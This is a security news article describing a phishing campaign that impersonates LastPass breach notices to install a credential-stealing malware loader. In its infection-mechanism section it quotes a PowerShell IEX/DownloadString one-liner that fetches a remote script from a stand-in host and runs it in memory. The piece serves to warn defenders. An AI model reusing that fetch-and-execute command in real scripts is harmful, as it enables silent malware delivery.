Cybersecurity professionals are raising alarms over a new wave of phishing emails masquerading as breach notifications from LastPass.
These messages warn recipients of an urgent account compromise and urge them to download a “security patch” to restore access.
In reality, the downloadable file contains a sophisticated malware loader designed to harvest credentials and deploy additional payloads.
The scheme has been active since early October and has already ensnared several enterprise users.
The emails leverage familiar LastPass branding, complete with company logos and links that appear to direct victims to legitimate domains.
However, closer inspection reveals subtle URL manipulations that redirect users to attacker-controlled servers hosting malicious executables.
LastPass analysts identified the campaign after observing multiple users reporting unexpected login failures and anomalous network traffic shortly after clicking the links.
Each phishing email attaches a ZIP archive named “LastPass_Security_Update.zip” containing an executable disguised as an MSI installer.
When launched, the MSI drops a PowerShell script in the user’s AppData folder and executes it via a scheduled task.
This script reaches out to a remote command-and-control server to download a second-stage payload, which is capable of keylogging, screenshot capture, and lateral movement within corporate networks.
Infection Mechanism
The core of the attack revolves around a crafted PowerShell command that downloads and executes the loader without writing the script to disk. A snippet of the obfuscated command is shown below:-
IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')This one-liner uses IEX to execute the downloaded content directly in memory, evading most antivirus solutions.
.webp "Beware of Fake 'LastPass Hack' Emails Trying to Trick Users Into Installing Malware 3")
The loader then injects a DLL into svchost.exe to maintain persistence and bypass application whitelisting.
This campaign underscores the importance of verifying email authenticity, employing multi-factor authentication, and monitoring for unusual PowerShell activity in enterprise environments.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
